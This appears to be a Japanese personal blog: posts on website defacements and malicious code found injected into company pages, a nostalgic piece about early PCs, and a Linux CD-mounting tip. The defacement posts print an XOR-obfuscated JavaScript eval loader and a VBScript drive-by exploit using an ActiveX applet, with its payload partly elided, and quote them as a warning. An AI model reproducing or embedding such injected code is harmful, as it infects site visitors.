Webの改竄って意外に多いの？(その後)

JPドメインでも改竄はやっぱり多いみたいです。

世の中にはこうした Webの改竄状況をモニターしているサイトがあり、
zone-h.jp の改竄アーカイブ

http://zone-h.jp/component/option,com_attacks/Itemid,17/

を見ると多数リストアップされています。

このリストの最新は日付が2007/1/7で、改竄されたURLが

http://dumpty.nih.go.jp/yoshikishu/default.htm

となってました。nih.go.jp っていうのは厚生労働省のドメイン。
やっぱりお役所のウェブって狙われやすいのかしらん。。

ちなみに、以前書いた、ウイルス配布コードが埋めこまれているWebですが
全く別の、とある企業サイトでも再びウイルスバスターが反応。

HTML ソースを見ると、やはり最後に以下のようなコードが追加されてました。

以前見つけたのは MS-JavaVMの脆弱性を突くタイプで、今回見つけたのも
またおんなじウイルスでした。ウイルス自体は古いものなので、昔こういう
ことが流行ったのかもしれません。

es= の部分が感染コードですね。。
アップデートしてないとウェブを眺めるだけでも感染！

< 埋めこまれていたウイルスコード(悪用厳禁!) >

<script>x=81;es="53;61;48;33;56;51;57;44;119;45;41;53;41;59;119;
71;93;11;5;22;4;11;2;72;26;24;8;81;79;6;27;4;1;72;92;91;3;25;18;22;24;
84;21;25;9;81;22;238;226;237;238;237;235;225;169;248;225;250;169;172;
250;231;235;228;249;175;162;180;253;243;254;255;241;238;166;173;189;
248;237;193;204;199;193;203;215;194;194;218;148;154;139;223;206;220;
192;220;221;219;221;211;
136;248;248;134;133;149;210;218;207;223;210;165;255;229;234;255;";
var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;

以前は「あぶないコードの埋めこみ」というと アングラの掲示板などの
専売特許だと思っていたのですが、最近は普通の企業サイトでもこんなこと
があるんですね。。。

アップデートしていないWindowsマシンでウェブを眺めるのはあぶないなぁ
と思いました。物騒な世の中になったもんだなぁと思います。

パソコンを始めたとき。。

はじめてＰＣを触ったのは大学生の頃。そのころパソコンといえば
NEC PC-9801 、シャープ X1 、富士通 FM-77 とかだった。

CPUの速度は 16Mhz で、メモリは「広大な主記憶 1メガバイト」
とか云ってた時代でした。今では信じられん！

メディアは５インチフロッピーディスクが主流で、フロッピー
以外のドライブと云えば、テープドライブぐらい(もちろん、
今の DAT とかじゃなくて、音楽テープね。ソニーの CHF 30分
みたいなやつ)

パソコンの用途は「Basic でプログラムを作る!」という男らしい（？）
方もいらっしゃったが、もちろん「ゲーム」をする、っていうのが
大多数。それもファミコンで売ってない「大人のゲーム」をする
のが主流でした。

誰かが「新しいゲームをコピーしてもらった」という話があると
集まって酒の飲みながら交替でゲームしたりしてました。
今から考えるとショボイ話ではあるが、「わくわくしながら大人
のゲームをしてた」自分がなんだか懐かしい。。

パソコンを買って知人からゲームを沢山コピーしてもらったは
良いものの、インストールのやり方や動かしかたが判らないから
色々調べたりしているうちに、すっかりＰＣにハマってしまい
ました。

今はもう「大人のゲーム」はしないけれど、仕事はシステム屋で
家ではLinuxマシンをいじって遊ぶ、という、相変わらず PC に
ハマった生活をしています。

う～ん、なんだかなぁ。

てなわけで、「はじめてのトラックバック」でした。

Webの改竄って意外に多いの？

なにげなく Webを見て回っていたら、不意に手元のウイルスバスタが
反応。

ハニャ？っと思って、htmlソースを見ると、 </html>の後にこんな
VBスクリプトが書いてあった。

ちなみにこれは、 http://www.earthcreate.co.jp/ のページ。
世の中にはこんな風に全然意識しないうちに、ウイルス配布元に
なってしまっているサイトも多いんだろうなぁ。

ちょっとびっくりしてしまったので、投稿。

<script language=vbscript>
document.write "

<"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET>

"
</script>
<script language=vbscript>
ExeString = "=gkBlUe^pc)ArkiMcvq%T`pMcvq%BcdkccPbel):nni^M`g^ar)?QM)PqQe^jj)PglMZrf)Ls`B%DgkZjwAbqiQs_IHlr_om&'IHP^rBff&'IH@kc_q^Kgibcs%HCJgh^Gr%HCApbZrcJZgj%HCNpli_e^mc&&Ck]Qr[DskrglgIG:nnbgbRl!Dgi^N_qa*RvicQqk'HlBkpmoPcpnkcGcvqQbmPbZbRbfn:DQL'MnbgRcumDgi^&DfecN^mf*.QfnQqk;Kc_aMckm'Pc^]?jiGcGlpmp&QfnQqk*

… 以下、ウイルスをエンコードしたコードが延々と続くため、中略 …
emr
Execute(ThisText) ← ここで、感染コードを実行するわけね。。
</script></BODY>
-->

Linux Tips

不定期ぶろぐ。
久々に後進。じゃなかった、更新。

今回は Linux Tips 。

誰かの三光、もとい、参考になるといいなぁ。。

#ほとんど、自分用のメモだけんどねぇ。。まぁ、こらえて
つかぁさいや。

Tips そのいち

------------------------------------------------------------
sjis のパーティションをマウントする方法
mount -o iocharset=euc-jp
------------------------------------------------------------

たとえば、Win 使ってる知人から「綺麗な女性の絵」がいっぱい
詰まったステキなＣＤもらったとする。

で、そのまま Linux マシンにつっこんでみると、あれれ。。
フォルダ名とかファイル名が化け化けになって、

え～ん、じぇーんじぇん判んないよ～。

なんてお嘆きの貴兄に。

あきらめるのはまだ早い！ってことで、以下は Win なフォルダ名
をちゃ～んと表示する方法。

まず、準備。

X-Window System で ＣＤを自動マウントにしてると、ぜ～んぜん
だめなので、まず自動マウントをオフにしてね。やりかたは各ＯＳ
のマニュアルを見てね。うん、RFM ( Read Fucking Manual )

次に CD をマウントするディレクトリを確認しましょう。
そう、マウントポイントですぅ。

ま、だ～いたいやね～(◯村健一 風に読んでね!)、
/mnt/cdrom とか /media/cdrom とかがあると思います。
各自御確認いたされい！

無ければ、作っちゃってもおっけー。

# mkdir /mnt/cdrom

で、おもむろにCDをドライブにセットする。
ここからがキモです。コマンドは以下。ちゃ～んと root で
入力してね。

# mount -t iso9660 -o iocharset=euc-jp /dev/cdrom /mnt/cdrom

ちょっとだけ解説すると。

-t iso9660

データCD のフォーマットは iso9660 に決まってんじゃん！
えっ？そんなの知らないって？そんなきみにはステキな言葉を
あげよう

「豆腐の角に頭をぶつけて逝ってよし！」

えっ？これも知らないって。しょーがねぇなぁ。じゃぁ。
続きを書くから良く読んでね。。

-o iocharset=euc-jp

これは、入出力時の文字コードを euc-jp にしてね！お願い
カーネルさーん！(注：カーネルサンダースではない)

/dev/cdrom

これは cdrom どらいぶね。判んねえ、って奴は居ねぇよな？

/mnt/cdrom

これは、マウントポイント。これも判んねえって奴は。。。

あっそうそう。ちゃ～んと使い終ったら、アンマウント
(注：アンコをＰＣに盛りつけることでは無い)しなよ～。

# umount /mnt/cdrom

ほな、ばいちゃ！